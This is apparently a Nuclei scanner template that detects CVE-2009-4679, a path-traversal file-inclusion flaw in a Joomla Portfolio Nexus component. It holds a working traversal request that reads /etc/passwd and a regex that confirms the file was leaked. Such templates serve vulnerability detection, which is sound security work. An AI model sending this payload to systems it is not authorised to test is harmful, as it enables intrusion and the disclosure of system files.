46 lines
1.7 KiB
YAML
46 lines
1.7 KiB
YAML
id: CVE-2009-4679
|
|
|
|
info:
|
|
name: Joomla! Portfolio Nexus - Remote File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
|
|
remediation: |
|
|
Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/33440
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2009-4679
|
|
- http://www.exploit-db.com/exploits/10754
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2009-4679
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00826
|
|
epss-percentile: 0.81565
|
|
cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: inertialfate
|
|
product: com_if_nexus
|
|
tags: cve2009,cve,joomla,lfi,nexus,edb,inertialfate
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022009e6d9fc063d9f363f1aa17a21509658c7830c53762598097f52e1f597f91c33022064ff511367ec547436041cce6d239bfe563e64bb05e8d8c7743fd1edb3d777db:922c64590222798bb761d5b6d8e72950 |